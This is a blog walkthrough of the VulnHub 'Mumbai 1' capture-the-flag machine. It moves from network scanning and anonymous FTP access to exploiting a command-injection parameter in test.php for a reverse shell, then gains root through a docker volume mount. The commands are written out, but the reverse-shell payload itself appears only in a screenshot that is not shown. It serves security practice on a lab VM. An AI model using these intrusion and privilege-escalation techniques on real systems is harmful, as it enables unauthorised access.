Capture the flag (CTF)

Mumbai 1: VulnHub CTF walkthrough

LetsPen Test
August 27, 2020 by
LetsPen Test

In this article, we will solve a capture the flag (CTF) challenge that was posted on the VulnHub website by an author named Dylan Barker. As per the description given by the author, this is an intermediate-level CTF and the target of the CTF is to get the root access of the machine and read the flag files. You can check my previous articles for more CTF challenges.

I have provided a downloadable URL for this CTF. You can download the machine and run it on VirtualBox. The torrent downloadable URL is also available for this VM and has been added in the reference section.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

For those who are not aware of the site, VulnHub is a well-known website for security researchers which aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. You can download vulnerable machines from this website and try to exploit them. There are a lot of other challenging CTF exercises available on VulnHub and I highly suggest attempting them, as it is a good way to sharpen your skills and learn new techniques in a safe environment.

Please note: For all these machines, I have used Oracle VirtualBox to run the downloaded machine. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

Summary of the steps

The summary of the steps for solving this CTF:

  1. Getting the IP address by using the Netdiscover utility
  2. Identifying open ports by using Nmap
  3. Enumerating FTP service
  4. Enumerating HTTP service
  5. Identifying vulnerabilities
  6. Getting the local access
  7. Enumeration for local exploit
  8. Exploiting Docker and getting the root

The walkthrough

Step 1

The first step to start any CTF is to identify the target machine IP address. Since we are running a virtual machine in the same network, we can identify the target machine IP address by running the netdiscover command. The output of the command can be seen in the following screenshot.

Command used: netdiscover

In the highlighted area above, we can see the target machine IP address. The target machine IP address is 192.168.1.2 and my Kali machine IP address is 192.168.1.54. We will be using 192.168.1.54 as the attacker machine IP address.

Note: Since the IP addresses are being assigned by the DHCP, they may be different in your case, depending on the network configuration.

Step 2

The next step is port scanning, which will give us information about the open ports. Through this scan, we can explore these ports for identifying vulnerabilities in the target system. I launched an Nmap full-port scan, which is used to check all the 65,531 ports. The command and the results of the Nmap scan can be seen in the screenshot given below.

Command used: nmap -p- -sV 192.168.1.2

You can see that this time, we used the –p- option with Nmap. It is used for a full port scanning and is the most common Nmap switch. After running the command, the tool will do most of the things by itself. In the above screenshot, we can see a large output generated by the Nmap scan. The summary of the scan is given below.

  • Port 21, which is the default port for FTP, was open and running version 3.0.3 of the VSFTP software
  • Port 22 was also found open. It is running SSH service and seems to be running an updated version of the software
  • Port 80 and 8000 were also found as open ports, running an HTTP service
  • Port 3306 is running MySQL service

Step 3

Because we know from the Nmap scan that FTP port was found OPEN on the target machine, I’ll start enumerating the service by using the default credentials. This luckily worked on the target machine.

Command used: ftp 192.168.1.2

Default credentials:

  • Username: anonymous
  • Password: anonymous

The above screenshot shows that we are able to log into the target machine with FTP default credentials. After that, I ran the ls command, which shows a file named “Note” available in the current directory. Let’s download this file from the target machine into our attacker machine and do some further analysis.

Commands used:

  • get Note
  • cat Note

In the above screenshot, we can see that first I used the get command to download the file through FTP on the attacker machine. After that I read the file using the cat command.

When we opened the file, we get a message hinting at a few possible loopholes on the target machine that can be explored further. It states that there are “HTTP servers running to Docker” and that there are privilege escalation issues on the server.

But here we did not get much information. In the next step, we will try to get information from the HTTP services.

Step 4

As we have already identified that port 80 and port 8000 are available on the target machine and both are being used for running the HTTP service, let’s open the target machine IP address on the browser. It can be seen in the following screenshot:

In the above screenshot, we can see that the web application that is running through the default port 80. It does not give any information here. Let’s open the target machine IP through the port 8000 on the browser, which can be seen below.

It was showing a default page. Now, let’s try to get more information on the web applications by running a dirb tool that will help us to identify some more entry points. I executed the dirb tool and the output of the scan can be seen in the following screenshot.

Command used: dirb http://192.168.1.2/

In the above highlighted area, we can see two directories identified by the tool. I manually checked all the files generated by the scan output. It did not provide any direct information which could help us to go further. I then accessed the directories on the browser, hoping to see internal files, as directory listing was enabled on the server. But no file was present:

After this, I opened the other directory on the browser, which can be seen in the following screenshot.

As this was a WordPress website and we all know that WordPress is a highly vulnerable CMS if the components and plugins are not updated on a regular basis, I decided to identify and explore vulnerabilities in the website before running DirBuster. I used the WPScan tool on the website, which is available in Kali Linux by default. The running command and scan results can be seen below.

Command used: wpscan  --url  http://192.168.1.2/wordpress

The WPScan gave a few minor vulnerabilities but none of them were useful in our case. We’re moving on to DirBuster.

DirBuster is a tool that is used to identify the hidden directories. The output of the tool can be seen in the following screenshot.

By running DirBuster, we found some new files on the target machine which we can explore further.

In the next step we will check these files one by one.

Step 5

In this step, I am using the Burp Suite tool for intercepting the requests; you can use any intercepting proxy that you are comfortable with. I started by checking the “test.php” file. This can be seen in the highlighted area of the following screenshot.

As per the above screenshot, while fetching the URL using the http GET method it is giving the error “Please post a proper query,” so let’s try to check by changing the http method from GET to POST. It can be seen in the following screenshot.

After changing the http method to POST, we are again getting the same error. Let’s try to put some query, as per the above highlighted error.

As we can see, we added a query parameter in the POST request and provided the web application URL. This time we received a different message. Now, let’s add a keyword to the site URL. This can be seen in the screenshot given below.

As we can see, when we provided “id” as the parameter value, it showed the current user on the target machine. This means that the query parameter is vulnerable for command execution. In the next step, let’s try to utilize this weakness to our advantage.

Step 6

In this step, we will write a reverse shell payload and try to execute that on the target machine through the “query” parameter. I also configured Netcut on my attacker machine to receive connections on port 1234. After this, I sent the request. The added payload and the response received can be seen in the following screenshot.

As we can see above, we received a 504 error response from the target machine. But the payload was successfully executed: we received the shell access on the attacker machine. This can be seen in the screenshot below.

We now have the reverse connection of the system, but it is a limited shell. In the next step, let’s move further to get the root access of the target machine.

Step 7

In the previous step, we got the shell access to “apiuser”, but it was the limited shell and our target is to take the root access of the target machine. So, I ran another Python command which gives us the stable shell access. After that, I enumerated the kernel version and operating system version of the target machine. This can be seen in the screenshot given below:

Command used:

  • python -c 'import pty;pty.spawn("/bin/bash")'
  • id
  • cat /etc/issue
  • uname -a

In the above screenshot, we can see the operating system and kernel version. I searched for an exploit online for these versions, but none of them seemed to be working. I started exploring the system for further information to help us take the root access.

Step 8

We know from step 3 that we received a hint which mentioned that the applications are running on docker. So, I executed the docker command on the target machine, which was allowed to run as root. This provided us the root access of the target machine. This can be seen in the following screenshot.

Command used: docker run -it -v /root:mnt/ignite ubuntu

After getting root access of the target machine, I started looking for the flag file, which is the last step of the CTF. It was in the “mnt/ignite/” directory. We end by reading the flag file.

Command used: cat proof.txt

In the above screenshot, we can see the flag file.

This completes the CTF. Hope you enjoyed solving it along with me!

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

 

Sources

  1. Mumbai: 1, VulnHub
  2. Download Mumbai: 1, VulnHub
  3. Download Mumbai: 1, Google Drive
  4. Download Mumbai: 1, VulnHub (torrent)
LetsPen Test
LetsPen Test